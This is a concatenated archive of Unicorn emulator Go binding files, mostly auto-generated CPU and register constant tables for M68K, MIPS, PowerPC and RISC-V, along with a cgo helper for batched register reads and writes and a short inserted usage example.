unicorn-2.1.1/bindings/go/unicorn/m68k_const.go000066400000000000000000000012661467524106700214120ustar00rootroot00000000000000package unicorn // For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [m68k_const.go] const ( // M68K CPU CPU_M68K_M5206 = 0 CPU_M68K_M68000 = 1 CPU_M68K_M68020 = 2 CPU_M68K_M68030 = 3 CPU_M68K_M68040 = 4 CPU_M68K_M68060 = 5 CPU_M68K_M5208 = 6 CPU_M68K_CFV4E = 7 CPU_M68K_ANY = 8 CPU_M68K_ENDING = 9 // M68K registers M68K_REG_INVALID = 0 M68K_REG_A0 = 1 M68K_REG_A1 = 2 M68K_REG_A2 = 3 M68K_REG_A3 = 4 M68K_REG_A4 = 5 M68K_REG_A5 = 6 M68K_REG_A6 = 7 M68K_REG_A7 = 8 M68K_REG_D0 = 9 M68K_REG_D1 = 10 M68K_REG_D2 = 11 M68K_REG_D3 = 12 M68K_REG_D4 = 13 M68K_REG_D5 = 14 M68K_REG_D6 = 15 M68K_REG_D7 = 16 M68K_REG_SR = 17 M68K_REG_PC = 18 M68K_REG_ENDING = 19 )unicorn-2.1.1/bindings/go/unicorn/mips_const.go000066400000000000000000000106071467524106700215740ustar00rootroot00000000000000package unicorn // For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT [mips_const.go] const ( // MIPS32 CPUS CPU_MIPS32_4KC = 0 CPU_MIPS32_4KM = 1 CPU_MIPS32_4KECR1 = 2 CPU_MIPS32_4KEMR1 = 3 CPU_MIPS32_4KEC = 4 CPU_MIPS32_4KEM = 5 CPU_MIPS32_24KC = 6 CPU_MIPS32_24KEC = 7 CPU_MIPS32_24KF = 8 CPU_MIPS32_34KF = 9 CPU_MIPS32_74KF = 10 CPU_MIPS32_M14K = 11 CPU_MIPS32_M14KC = 12 CPU_MIPS32_P5600 = 13 CPU_MIPS32_MIPS32R6_GENERIC = 14 CPU_MIPS32_I7200 = 15 CPU_MIPS32_ENDING = 16 // MIPS64 CPUS CPU_MIPS64_R4000 = 0 CPU_MIPS64_VR5432 = 1 CPU_MIPS64_5KC = 2 CPU_MIPS64_5KF = 3 CPU_MIPS64_20KC = 4 CPU_MIPS64_MIPS64R2_GENERIC = 5 CPU_MIPS64_5KEC = 6 CPU_MIPS64_5KEF = 7 CPU_MIPS64_I6400 = 8 CPU_MIPS64_I6500 = 9 CPU_MIPS64_LOONGSON_2E = 10 CPU_MIPS64_LOONGSON_2F = 11 CPU_MIPS64_MIPS64DSPR2 = 12 CPU_MIPS64_ENDING = 13 // MIPS registers MIPS_REG_INVALID = 0 // General purpose registers MIPS_REG_PC = 1 MIPS_REG_0 = 2 MIPS_REG_1 = 3 MIPS_REG_2 = 4 MIPS_REG_3 = 5 MIPS_REG_4 = 6 MIPS_REG_5 = 7 MIPS_REG_6 = 8 MIPS_REG_7 = 9 MIPS_REG_8 = 10 MIPS_REG_9 = 11 MIPS_REG_10 = 12 MIPS_REG_11 = 13 MIPS_REG_12 = 14 MIPS_REG_13 = 15 MIPS_REG_14 = 16 MIPS_REG_15 = 17 MIPS_REG_16 = 18 MIPS_REG_17 = 19 MIPS_REG_18 = 20 MIPS_REG_19 = 21 MIPS_REG_20 = 22 MIPS_REG_21 = 23 MIPS_REG_22 = 24 MIPS_REG_23 = 25 MIPS_REG_24 = 26 MIPS_REG_25 = 27 MIPS_REG_26 = 28 MIPS_REG_27 = 29 MIPS_REG_28 = 30 MIPS_REG_29 = 31 MIPS_REG_30 = 32 MIPS_REG_31 = 33 // DSP registers MIPS_REG_DSPCCOND = 34 MIPS_REG_DSPCARRY = 35 MIPS_REG_DSPEFI = 36 MIPS_REG_DSPOUTFLAG = 37 MIPS_REG_DSPOUTFLAG16_19 = 38 MIPS_REG_DSPOUTFLAG20 = 39 MIPS_REG_DSPOUTFLAG21 = 40 MIPS_REG_DSPOUTFLAG22 = 41 MIPS_REG_DSPOUTFLAG23 = 42 MIPS_REG_DSPPOS = 43 MIPS_REG_DSPSCOUNT = 44 // ACC registers MIPS_REG_AC0 = 45 MIPS_REG_AC1 = 46 MIPS_REG_AC2 = 47 MIPS_REG_AC3 = 48 // COP registers MIPS_REG_CC0 = 49 MIPS_REG_CC1 = 50 MIPS_REG_CC2 = 51 MIPS_REG_CC3 = 52 MIPS_REG_CC4 = 53 MIPS_REG_CC5 = 54 MIPS_REG_CC6 = 55 MIPS_REG_CC7 = 56 // FPU registers MIPS_REG_F0 = 57 MIPS_REG_F1 = 58 MIPS_REG_F2 = 59 MIPS_REG_F3 = 60 MIPS_REG_F4 = 61 MIPS_REG_F5 = 62 MIPS_REG_F6 = 63 MIPS_REG_F7 = 64 MIPS_REG_F8 = 65 MIPS_REG_F9 = 66 MIPS_REG_F10 = 67 MIPS_REG_F11 = 68 MIPS_REG_F12 = 69 MIPS_REG_F13 = 70 MIPS_REG_F14 = 71 MIPS_REG_F15 = 72 MIPS_REG_F16 = 73 MIPS_REG_F17 = 74 MIPS_REG_F18 = 75 MIPS_REG_F19 = 76 MIPS_REG_F20 = 77 MIPS_REG_F21 = 78 MIPS_REG_F22 = 79 MIPS_REG_F23 = 80 MIPS_REG_F24 = 81 MIPS_REG_F25 = 82 MIPS_REG_F26 = 83 MIPS_REG_F27 = 84 MIPS_REG_F28 = 85 MIPS_REG_F29 = 86 MIPS_REG_F30 = 87 MIPS_REG_F31 = 88 MIPS_REG_FCC0 = 89 MIPS_REG_FCC1 = 90 MIPS_REG_FCC2 = 91 MIPS_REG_FCC3 = 92 MIPS_REG_FCC4 = 93 MIPS_REG_FCC5 = 94 MIPS_REG_FCC6 = 95 MIPS_REG_FCC7 = 96 // AFPR128 MIPS_REG_W0 = 97 MIPS_REG_W1 = 98 MIPS_REG_W2 = 99 MIPS_REG_W3 = 100 MIPS_REG_W4 = 101 MIPS_REG_W5 = 102 MIPS_REG_W6 = 103 MIPS_REG_W7 = 104 MIPS_REG_W8 = 105 MIPS_REG_W9 = 106 MIPS_REG_W10 = 107 MIPS_REG_W11 = 108 MIPS_REG_W12 = 109 MIPS_REG_W13 = 110 MIPS_REG_W14 = 111 MIPS_REG_W15 = 112 MIPS_REG_W16 = 113 MIPS_REG_W17 = 114 MIPS_REG_W18 = 115 MIPS_REG_W19 = 116 MIPS_REG_W20 = 117 MIPS_REG_W21 = 118 MIPS_REG_W22 = 119 MIPS_REG_W23 = 120 MIPS_REG_W24 = 121 MIPS_REG_W25 = 122 MIPS_REG_W26 = 123 MIPS_REG_W27 = 124 MIPS_REG_W28 = 125 MIPS_REG_W29 = 126 MIPS_REG_W30 = 127 MIPS_REG_W31 = 128 MIPS_REG_HI = 129 MIPS_REG_LO = 130 MIPS_REG_P0 = 131 MIPS_REG_P1 = 132 MIPS_REG_P2 = 133 MIPS_REG_MPL0 = 134 MIPS_REG_MPL1 = 135 MIPS_REG_MPL2 = 136 MIPS_REG_CP0_CONFIG3 = 137 MIPS_REG_CP0_USERLOCAL = 138 MIPS_REG_CP0_STATUS = 139 MIPS_REG_ENDING = 140 MIPS_REG_ZERO = 2 MIPS_REG_AT = 
3 MIPS_REG_V0 = 4 MIPS_REG_V1 = 5 MIPS_REG_A0 = 6 MIPS_REG_A1 = 7 MIPS_REG_A2 = 8 MIPS_REG_A3 = 9 MIPS_REG_T0 = 10 MIPS_REG_T1 = 11 MIPS_REG_T2 = 12 MIPS_REG_T3 = 13 MIPS_REG_T4 = 14 MIPS_REG_T5 = 15 MIPS_REG_T6 = 16 MIPS_REG_T7 = 17 MIPS_REG_S0 = 18 MIPS_REG_S1 = 19 MIPS_REG_S2 = 20 MIPS_REG_S3 = 21 MIPS_REG_S4 = 22 MIPS_REG_S5 = 23 MIPS_REG_S6 = 24 MIPS_REG_S7 = 25 MIPS_REG_T8 = 26 MIPS_REG_T9 = 27 MIPS_REG_K0 = 28 MIPS_REG_K1 = 29 MIPS_REG_GP = 30 MIPS_REG_SP = 31 MIPS_REG_FP = 32 MIPS_REG_S8 = 32 MIPS_REG_RA = 33 MIPS_REG_HI0 = 45 MIPS_REG_HI1 = 46 MIPS_REG_HI2 = 47 MIPS_REG_HI3 = 48 MIPS_REG_LO0 = 45 MIPS_REG_LO1 = 46 MIPS_REG_LO2 = 47 MIPS_REG_LO3 = 48 )unicorn-2.1.1/bindings/go/unicorn/ppc_const.go000066400000000000000000000227721467524106700214140ustar00rootroot00000000000000package unicorn // For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [ppc_const.go] const ( // PPC CPU CPU_PPC32_401 = 0 CPU_PPC32_401A1 = 1 CPU_PPC32_401B2 = 2 CPU_PPC32_401C2 = 3 CPU_PPC32_401D2 = 4 CPU_PPC32_401E2 = 5 CPU_PPC32_401F2 = 6 CPU_PPC32_401G2 = 7 CPU_PPC32_IOP480 = 8 CPU_PPC32_COBRA = 9 CPU_PPC32_403GA = 10 CPU_PPC32_403GB = 11 CPU_PPC32_403GC = 12 CPU_PPC32_403GCX = 13 CPU_PPC32_405D2 = 14 CPU_PPC32_405D4 = 15 CPU_PPC32_405CRA = 16 CPU_PPC32_405CRB = 17 CPU_PPC32_405CRC = 18 CPU_PPC32_405EP = 19 CPU_PPC32_405EZ = 20 CPU_PPC32_405GPA = 21 CPU_PPC32_405GPB = 22 CPU_PPC32_405GPC = 23 CPU_PPC32_405GPD = 24 CPU_PPC32_405GPR = 25 CPU_PPC32_405LP = 26 CPU_PPC32_NPE405H = 27 CPU_PPC32_NPE405H2 = 28 CPU_PPC32_NPE405L = 29 CPU_PPC32_NPE4GS3 = 30 CPU_PPC32_STB03 = 31 CPU_PPC32_STB04 = 32 CPU_PPC32_STB25 = 33 CPU_PPC32_X2VP4 = 34 CPU_PPC32_X2VP20 = 35 CPU_PPC32_440_XILINX = 36 CPU_PPC32_440_XILINX_W_DFPU = 37 CPU_PPC32_440EPA = 38 CPU_PPC32_440EPB = 39 CPU_PPC32_440EPX = 40 CPU_PPC32_460EXB = 41 CPU_PPC32_G2 = 42 CPU_PPC32_G2H4 = 43 CPU_PPC32_G2GP = 44 CPU_PPC32_G2LS = 45 CPU_PPC32_G2HIP3 = 46 CPU_PPC32_G2HIP4 = 47 CPU_PPC32_MPC603 = 48 CPU_PPC32_G2LE = 49 CPU_PPC32_G2LEGP = 50 CPU_PPC32_G2LELS = 51 CPU_PPC32_G2LEGP1 = 52 CPU_PPC32_G2LEGP3 = 53 CPU_PPC32_MPC5200_V10 = 54 CPU_PPC32_MPC5200_V11 = 55 CPU_PPC32_MPC5200_V12 = 56 CPU_PPC32_MPC5200B_V20 = 57 CPU_PPC32_MPC5200B_V21 = 58 CPU_PPC32_E200Z5 = 59 CPU_PPC32_E200Z6 = 60 CPU_PPC32_E300C1 = 61 CPU_PPC32_E300C2 = 62 CPU_PPC32_E300C3 = 63 CPU_PPC32_E300C4 = 64 CPU_PPC32_MPC8343 = 65 CPU_PPC32_MPC8343A = 66 CPU_PPC32_MPC8343E = 67 CPU_PPC32_MPC8343EA = 68 CPU_PPC32_MPC8347T = 69 CPU_PPC32_MPC8347P = 70 CPU_PPC32_MPC8347AT = 71 CPU_PPC32_MPC8347AP = 72 CPU_PPC32_MPC8347ET = 73 CPU_PPC32_MPC8347EP = 74 CPU_PPC32_MPC8347EAT = 75 CPU_PPC32_MPC8347EAP = 76 CPU_PPC32_MPC8349 = 77 CPU_PPC32_MPC8349A = 78 CPU_PPC32_MPC8349E = 79 CPU_PPC32_MPC8349EA = 80 CPU_PPC32_MPC8377 = 81 CPU_PPC32_MPC8377E = 82 CPU_PPC32_MPC8378 = 83 CPU_PPC32_MPC8378E = 84 CPU_PPC32_MPC8379 = 85 CPU_PPC32_MPC8379E = 86 CPU_PPC32_E500_V10 = 87 CPU_PPC32_E500_V20 = 88 CPU_PPC32_E500V2_V10 = 89 CPU_PPC32_E500V2_V20 = 90 CPU_PPC32_E500V2_V21 = 91 CPU_PPC32_E500V2_V22 = 92 CPU_PPC32_E500V2_V30 = 93 CPU_PPC32_E500MC = 94 CPU_PPC32_MPC8533_V10 = 95 CPU_PPC32_MPC8533_V11 = 96 CPU_PPC32_MPC8533E_V10 = 97 CPU_PPC32_MPC8533E_V11 = 98 CPU_PPC32_MPC8540_V10 = 99 CPU_PPC32_MPC8540_V20 = 100 CPU_PPC32_MPC8540_V21 = 101 CPU_PPC32_MPC8541_V10 = 102 CPU_PPC32_MPC8541_V11 = 103 CPU_PPC32_MPC8541E_V10 = 104 CPU_PPC32_MPC8541E_V11 = 105 CPU_PPC32_MPC8543_V10 = 106 CPU_PPC32_MPC8543_V11 = 107 CPU_PPC32_MPC8543_V20 = 108 CPU_PPC32_MPC8543_V21 = 109 CPU_PPC32_MPC8543E_V10 = 110 CPU_PPC32_MPC8543E_V11 = 111 
CPU_PPC32_MPC8543E_V20 = 112 CPU_PPC32_MPC8543E_V21 = 113 CPU_PPC32_MPC8544_V10 = 114 CPU_PPC32_MPC8544_V11 = 115 CPU_PPC32_MPC8544E_V10 = 116 CPU_PPC32_MPC8544E_V11 = 117 CPU_PPC32_MPC8545_V20 = 118 CPU_PPC32_MPC8545_V21 = 119 CPU_PPC32_MPC8545E_V20 = 120 CPU_PPC32_MPC8545E_V21 = 121 CPU_PPC32_MPC8547E_V20 = 122 CPU_PPC32_MPC8547E_V21 = 123 CPU_PPC32_MPC8548_V10 = 124 CPU_PPC32_MPC8548_V11 = 125 CPU_PPC32_MPC8548_V20 = 126 CPU_PPC32_MPC8548_V21 = 127 CPU_PPC32_MPC8548E_V10 = 128 CPU_PPC32_MPC8548E_V11 = 129 CPU_PPC32_MPC8548E_V20 = 130 CPU_PPC32_MPC8548E_V21 = 131 CPU_PPC32_MPC8555_V10 = 132 CPU_PPC32_MPC8555_V11 = 133 CPU_PPC32_MPC8555E_V10 = 134 CPU_PPC32_MPC8555E_V11 = 135 CPU_PPC32_MPC8560_V10 = 136 CPU_PPC32_MPC8560_V20 = 137 CPU_PPC32_MPC8560_V21 = 138 CPU_PPC32_MPC8567 = 139 CPU_PPC32_MPC8567E = 140 CPU_PPC32_MPC8568 = 141 CPU_PPC32_MPC8568E = 142 CPU_PPC32_MPC8572 = 143 CPU_PPC32_MPC8572E = 144 CPU_PPC32_E600 = 145 CPU_PPC32_MPC8610 = 146 CPU_PPC32_MPC8641 = 147 CPU_PPC32_MPC8641D = 148 CPU_PPC32_601_V0 = 149 CPU_PPC32_601_V1 = 150 CPU_PPC32_601_V2 = 151 CPU_PPC32_602 = 152 CPU_PPC32_603 = 153 CPU_PPC32_603E_V1_1 = 154 CPU_PPC32_603E_V1_2 = 155 CPU_PPC32_603E_V1_3 = 156 CPU_PPC32_603E_V1_4 = 157 CPU_PPC32_603E_V2_2 = 158 CPU_PPC32_603E_V3 = 159 CPU_PPC32_603E_V4 = 160 CPU_PPC32_603E_V4_1 = 161 CPU_PPC32_603E7 = 162 CPU_PPC32_603E7T = 163 CPU_PPC32_603E7V = 164 CPU_PPC32_603E7V1 = 165 CPU_PPC32_603E7V2 = 166 CPU_PPC32_603P = 167 CPU_PPC32_604 = 168 CPU_PPC32_604E_V1_0 = 169 CPU_PPC32_604E_V2_2 = 170 CPU_PPC32_604E_V2_4 = 171 CPU_PPC32_604R = 172 CPU_PPC32_740_V1_0 = 173 CPU_PPC32_750_V1_0 = 174 CPU_PPC32_740_V2_0 = 175 CPU_PPC32_750_V2_0 = 176 CPU_PPC32_740_V2_1 = 177 CPU_PPC32_750_V2_1 = 178 CPU_PPC32_740_V2_2 = 179 CPU_PPC32_750_V2_2 = 180 CPU_PPC32_740_V3_0 = 181 CPU_PPC32_750_V3_0 = 182 CPU_PPC32_740_V3_1 = 183 CPU_PPC32_750_V3_1 = 184 CPU_PPC32_740E = 185 CPU_PPC32_750E = 186 CPU_PPC32_740P = 187 CPU_PPC32_750P = 188 CPU_PPC32_750CL_V1_0 = 189 CPU_PPC32_750CL_V2_0 = 190 CPU_PPC32_750CX_V1_0 = 191 CPU_PPC32_750CX_V2_0 = 192 CPU_PPC32_750CX_V2_1 = 193 CPU_PPC32_750CX_V2_2 = 194 CPU_PPC32_750CXE_V2_1 = 195 CPU_PPC32_750CXE_V2_2 = 196 CPU_PPC32_750CXE_V2_3 = 197 CPU_PPC32_750CXE_V2_4 = 198 CPU_PPC32_750CXE_V2_4B = 199 CPU_PPC32_750CXE_V3_0 = 200 CPU_PPC32_750CXE_V3_1 = 201 CPU_PPC32_750CXE_V3_1B = 202 CPU_PPC32_750CXR = 203 CPU_PPC32_750FL = 204 CPU_PPC32_750FX_V1_0 = 205 CPU_PPC32_750FX_V2_0 = 206 CPU_PPC32_750FX_V2_1 = 207 CPU_PPC32_750FX_V2_2 = 208 CPU_PPC32_750FX_V2_3 = 209 CPU_PPC32_750GL = 210 CPU_PPC32_750GX_V1_0 = 211 CPU_PPC32_750GX_V1_1 = 212 CPU_PPC32_750GX_V1_2 = 213 CPU_PPC32_750L_V2_0 = 214 CPU_PPC32_750L_V2_1 = 215 CPU_PPC32_750L_V2_2 = 216 CPU_PPC32_750L_V3_0 = 217 CPU_PPC32_750L_V3_2 = 218 CPU_PPC32_745_V1_0 = 219 CPU_PPC32_755_V1_0 = 220 CPU_PPC32_745_V1_1 = 221 CPU_PPC32_755_V1_1 = 222 CPU_PPC32_745_V2_0 = 223 CPU_PPC32_755_V2_0 = 224 CPU_PPC32_745_V2_1 = 225 CPU_PPC32_755_V2_1 = 226 CPU_PPC32_745_V2_2 = 227 CPU_PPC32_755_V2_2 = 228 CPU_PPC32_745_V2_3 = 229 CPU_PPC32_755_V2_3 = 230 CPU_PPC32_745_V2_4 = 231 CPU_PPC32_755_V2_4 = 232 CPU_PPC32_745_V2_5 = 233 CPU_PPC32_755_V2_5 = 234 CPU_PPC32_745_V2_6 = 235 CPU_PPC32_755_V2_6 = 236 CPU_PPC32_745_V2_7 = 237 CPU_PPC32_755_V2_7 = 238 CPU_PPC32_745_V2_8 = 239 CPU_PPC32_755_V2_8 = 240 CPU_PPC32_7400_V1_0 = 241 CPU_PPC32_7400_V1_1 = 242 CPU_PPC32_7400_V2_0 = 243 CPU_PPC32_7400_V2_1 = 244 CPU_PPC32_7400_V2_2 = 245 CPU_PPC32_7400_V2_6 = 246 CPU_PPC32_7400_V2_7 = 247 CPU_PPC32_7400_V2_8 = 248 CPU_PPC32_7400_V2_9 = 249 
CPU_PPC32_7410_V1_0 = 250 CPU_PPC32_7410_V1_1 = 251 CPU_PPC32_7410_V1_2 = 252 CPU_PPC32_7410_V1_3 = 253 CPU_PPC32_7410_V1_4 = 254 CPU_PPC32_7448_V1_0 = 255 CPU_PPC32_7448_V1_1 = 256 CPU_PPC32_7448_V2_0 = 257 CPU_PPC32_7448_V2_1 = 258 CPU_PPC32_7450_V1_0 = 259 CPU_PPC32_7450_V1_1 = 260 CPU_PPC32_7450_V1_2 = 261 CPU_PPC32_7450_V2_0 = 262 CPU_PPC32_7450_V2_1 = 263 CPU_PPC32_7441_V2_1 = 264 CPU_PPC32_7441_V2_3 = 265 CPU_PPC32_7451_V2_3 = 266 CPU_PPC32_7441_V2_10 = 267 CPU_PPC32_7451_V2_10 = 268 CPU_PPC32_7445_V1_0 = 269 CPU_PPC32_7455_V1_0 = 270 CPU_PPC32_7445_V2_1 = 271 CPU_PPC32_7455_V2_1 = 272 CPU_PPC32_7445_V3_2 = 273 CPU_PPC32_7455_V3_2 = 274 CPU_PPC32_7445_V3_3 = 275 CPU_PPC32_7455_V3_3 = 276 CPU_PPC32_7445_V3_4 = 277 CPU_PPC32_7455_V3_4 = 278 CPU_PPC32_7447_V1_0 = 279 CPU_PPC32_7457_V1_0 = 280 CPU_PPC32_7447_V1_1 = 281 CPU_PPC32_7457_V1_1 = 282 CPU_PPC32_7457_V1_2 = 283 CPU_PPC32_7447A_V1_0 = 284 CPU_PPC32_7457A_V1_0 = 285 CPU_PPC32_7447A_V1_1 = 286 CPU_PPC32_7457A_V1_1 = 287 CPU_PPC32_7447A_V1_2 = 288 CPU_PPC32_7457A_V1_2 = 289 CPU_PPC32_ENDING = 290 // PPC64 CPU CPU_PPC64_E5500 = 0 CPU_PPC64_E6500 = 1 CPU_PPC64_970_V2_2 = 2 CPU_PPC64_970FX_V1_0 = 3 CPU_PPC64_970FX_V2_0 = 4 CPU_PPC64_970FX_V2_1 = 5 CPU_PPC64_970FX_V3_0 = 6 CPU_PPC64_970FX_V3_1 = 7 CPU_PPC64_970MP_V1_0 = 8 CPU_PPC64_970MP_V1_1 = 9 CPU_PPC64_POWER5_V2_1 = 10 CPU_PPC64_POWER7_V2_3 = 11 CPU_PPC64_POWER7_V2_1 = 12 CPU_PPC64_POWER8E_V2_1 = 13 CPU_PPC64_POWER8_V2_0 = 14 CPU_PPC64_POWER8NVL_V1_0 = 15 CPU_PPC64_POWER9_V1_0 = 16 CPU_PPC64_POWER9_V2_0 = 17 CPU_PPC64_POWER10_V1_0 = 18 CPU_PPC64_ENDING = 19 // PPC registers PPC_REG_INVALID = 0 // General purpose registers PPC_REG_PC = 1 PPC_REG_0 = 2 PPC_REG_1 = 3 PPC_REG_2 = 4 PPC_REG_3 = 5 PPC_REG_4 = 6 PPC_REG_5 = 7 PPC_REG_6 = 8 PPC_REG_7 = 9 PPC_REG_8 = 10 PPC_REG_9 = 11 PPC_REG_10 = 12 PPC_REG_11 = 13 PPC_REG_12 = 14 PPC_REG_13 = 15 PPC_REG_14 = 16 PPC_REG_15 = 17 PPC_REG_16 = 18 PPC_REG_17 = 19 PPC_REG_18 = 20 PPC_REG_19 = 21 PPC_REG_20 = 22 PPC_REG_21 = 23 PPC_REG_22 = 24 PPC_REG_23 = 25 PPC_REG_24 = 26 PPC_REG_25 = 27 PPC_REG_26 = 28 PPC_REG_27 = 29 PPC_REG_28 = 30 PPC_REG_29 = 31 PPC_REG_30 = 32 PPC_REG_31 = 33 PPC_REG_CR0 = 34 PPC_REG_CR1 = 35 PPC_REG_CR2 = 36 PPC_REG_CR3 = 37 PPC_REG_CR4 = 38 PPC_REG_CR5 = 39 PPC_REG_CR6 = 40 PPC_REG_CR7 = 41 PPC_REG_FPR0 = 42 PPC_REG_FPR1 = 43 PPC_REG_FPR2 = 44 PPC_REG_FPR3 = 45 PPC_REG_FPR4 = 46 PPC_REG_FPR5 = 47 PPC_REG_FPR6 = 48 PPC_REG_FPR7 = 49 PPC_REG_FPR8 = 50 PPC_REG_FPR9 = 51 PPC_REG_FPR10 = 52 PPC_REG_FPR11 = 53 PPC_REG_FPR12 = 54 PPC_REG_FPR13 = 55 PPC_REG_FPR14 = 56 PPC_REG_FPR15 = 57 PPC_REG_FPR16 = 58 PPC_REG_FPR17 = 59 PPC_REG_FPR18 = 60 PPC_REG_FPR19 = 61 PPC_REG_FPR20 = 62 PPC_REG_FPR21 = 63 PPC_REG_FPR22 = 64 PPC_REG_FPR23 = 65 PPC_REG_FPR24 = 66 PPC_REG_FPR25 = 67 PPC_REG_FPR26 = 68 PPC_REG_FPR27 = 69 PPC_REG_FPR28 = 70 PPC_REG_FPR29 = 71 PPC_REG_FPR30 = 72 PPC_REG_FPR31 = 73 PPC_REG_LR = 74 PPC_REG_XER = 75 PPC_REG_CTR = 76 PPC_REG_MSR = 77 PPC_REG_FPSCR = 78 PPC_REG_CR = 79 PPC_REG_ENDING = 80 )unicorn-2.1.1/bindings/go/unicorn/reg_batch.go000066400000000000000000000042751467524106700213400ustar00rootroot00000000000000package unicorn import ( "errors" "runtime" "unsafe" ) /* #include void *reg_batch_setup(int *regs, int count, uint64_t **vals, int **enums, void ***refs) { size_t uvsz = sizeof(uint64_t) * count; size_t ensz = sizeof(int) * count; size_t ursz = sizeof(uintptr_t) * count; int i; uintptr_t buf = (uintptr_t)calloc(1, uvsz+ensz+ursz); if (buf == 0) return NULL; *vals = (uint64_t *)buf; *enums = (int 
*)(buf + uvsz);
    *refs = (void **)(buf + uvsz + ensz);
    for (i = 0; i < count; i++) {
        (*enums)[i] = regs[i];
        (*refs)[i] = &(*vals)[i];
    }
    return (void *)buf;
}
*/
import "C"

type RegBatch struct {
	// cast to local type
	vals []uint64
	// pass these to C
	cenums *C.int
	crefs  *unsafe.Pointer
	ccount C.int
}

func regBatchSetup(regs []int) (buf unsafe.Pointer, vals []uint64, cenums *C.int, crefs *unsafe.Pointer) {
	enums := make([]C.int, len(regs))
	for i := 0; i < len(regs); i++ {
		enums[i] = C.int(regs[i])
	}
	var cvals *C.uint64_t
	var inEnums *C.int
	if len(regs) > 0 {
		inEnums = (*C.int)(unsafe.Pointer(&enums[0]))
	}
	buf = C.reg_batch_setup(inEnums, C.int(len(regs)), &cvals, &cenums, &crefs)
	vals = (*[1 << 24]uint64)(unsafe.Pointer(cvals))[:len(regs)]
	return
}

func NewRegBatch(regs []int) (*RegBatch, error) {
	r := &RegBatch{}
	var buf unsafe.Pointer
	buf, r.vals, r.cenums, r.crefs = regBatchSetup(regs)
	if buf == nil {
		return nil, errors.New("failed to allocate RegBatch memory")
	}
	r.ccount = C.int(len(regs))
	// when RegBatch is collected, free C-owned data
	runtime.SetFinalizer(r, func(r *RegBatch) { C.free(buf) })
	return r, nil
}

// ReadFast skips copying and returns the internal vals array
func (r *RegBatch) ReadFast(u Unicorn) ([]uint64, error) {
	ucerr := C.uc_reg_read_batch(u.Handle(), r.cenums, r.crefs, r.ccount)
	if ucerr != ERR_OK {
		return nil, errReturn(ucerr)
	}
	return r.vals, nil
}

func (r *RegBatch) Read(u Unicorn, vals []uint64) error {
	tmp, err := r.ReadFast(u)
	if err != nil {
		return err
	}
	copy(vals, tmp[:len(vals)])
	return nil
}

func (r *RegBatch) Write(u Unicorn, vals []uint64) error {
	copy(r.vals[:len(vals)], vals)
	ucerr := C.uc_reg_write_batch(u.Handle(), r.cenums, r.crefs, r.ccount)
	return errReturn(ucerr)
}
unicorn-2.1.1/bindings/go/unicorn/riscv_const.go000066400000000000000000000144731467524106700217550ustar00rootroot00000000000000package unicorn
// For Unicorn Engine.
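// Editor's example -- not part of the generated bindings: typical use of the
// RegBatch helper defined in reg_batch.go above, shown here with the MIPS
// alias constants from mips_const.go. `mu` is assumed to be an engine created
// elsewhere via NewUnicorn(ARCH_MIPS, MODE_MIPS32); the register selection is
// illustrative only.
func readMipsCallState(mu Unicorn) ([]uint64, error) {
	batch, err := NewRegBatch([]int{MIPS_REG_A0, MIPS_REG_A1, MIPS_REG_SP, MIPS_REG_RA})
	if err != nil {
		return nil, err
	}
	// ReadFast returns the batch's internal buffer, so code that polls the
	// same register set repeatedly avoids a fresh allocation per call.
	return batch.ReadFast(mu)
}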
AUTO-GENERATED FILE, DO NOT EDIT [riscv_const.go] const ( // RISCV32 CPU CPU_RISCV32_ANY = 0 CPU_RISCV32_BASE32 = 1 CPU_RISCV32_SIFIVE_E31 = 2 CPU_RISCV32_SIFIVE_U34 = 3 CPU_RISCV32_ENDING = 4 // RISCV64 CPU CPU_RISCV64_ANY = 0 CPU_RISCV64_BASE64 = 1 CPU_RISCV64_SIFIVE_E51 = 2 CPU_RISCV64_SIFIVE_U54 = 3 CPU_RISCV64_ENDING = 4 // RISCV registers RISCV_REG_INVALID = 0 // General purpose registers RISCV_REG_X0 = 1 RISCV_REG_X1 = 2 RISCV_REG_X2 = 3 RISCV_REG_X3 = 4 RISCV_REG_X4 = 5 RISCV_REG_X5 = 6 RISCV_REG_X6 = 7 RISCV_REG_X7 = 8 RISCV_REG_X8 = 9 RISCV_REG_X9 = 10 RISCV_REG_X10 = 11 RISCV_REG_X11 = 12 RISCV_REG_X12 = 13 RISCV_REG_X13 = 14 RISCV_REG_X14 = 15 RISCV_REG_X15 = 16 RISCV_REG_X16 = 17 RISCV_REG_X17 = 18 RISCV_REG_X18 = 19 RISCV_REG_X19 = 20 RISCV_REG_X20 = 21 RISCV_REG_X21 = 22 RISCV_REG_X22 = 23 RISCV_REG_X23 = 24 RISCV_REG_X24 = 25 RISCV_REG_X25 = 26 RISCV_REG_X26 = 27 RISCV_REG_X27 = 28 RISCV_REG_X28 = 29 RISCV_REG_X29 = 30 RISCV_REG_X30 = 31 RISCV_REG_X31 = 32 // RISCV CSR RISCV_REG_USTATUS = 33 RISCV_REG_UIE = 34 RISCV_REG_UTVEC = 35 RISCV_REG_USCRATCH = 36 RISCV_REG_UEPC = 37 RISCV_REG_UCAUSE = 38 RISCV_REG_UTVAL = 39 RISCV_REG_UIP = 40 RISCV_REG_FFLAGS = 41 RISCV_REG_FRM = 42 RISCV_REG_FCSR = 43 RISCV_REG_CYCLE = 44 RISCV_REG_TIME = 45 RISCV_REG_INSTRET = 46 RISCV_REG_HPMCOUNTER3 = 47 RISCV_REG_HPMCOUNTER4 = 48 RISCV_REG_HPMCOUNTER5 = 49 RISCV_REG_HPMCOUNTER6 = 50 RISCV_REG_HPMCOUNTER7 = 51 RISCV_REG_HPMCOUNTER8 = 52 RISCV_REG_HPMCOUNTER9 = 53 RISCV_REG_HPMCOUNTER10 = 54 RISCV_REG_HPMCOUNTER11 = 55 RISCV_REG_HPMCOUNTER12 = 56 RISCV_REG_HPMCOUNTER13 = 57 RISCV_REG_HPMCOUNTER14 = 58 RISCV_REG_HPMCOUNTER15 = 59 RISCV_REG_HPMCOUNTER16 = 60 RISCV_REG_HPMCOUNTER17 = 61 RISCV_REG_HPMCOUNTER18 = 62 RISCV_REG_HPMCOUNTER19 = 63 RISCV_REG_HPMCOUNTER20 = 64 RISCV_REG_HPMCOUNTER21 = 65 RISCV_REG_HPMCOUNTER22 = 66 RISCV_REG_HPMCOUNTER23 = 67 RISCV_REG_HPMCOUNTER24 = 68 RISCV_REG_HPMCOUNTER25 = 69 RISCV_REG_HPMCOUNTER26 = 70 RISCV_REG_HPMCOUNTER27 = 71 RISCV_REG_HPMCOUNTER28 = 72 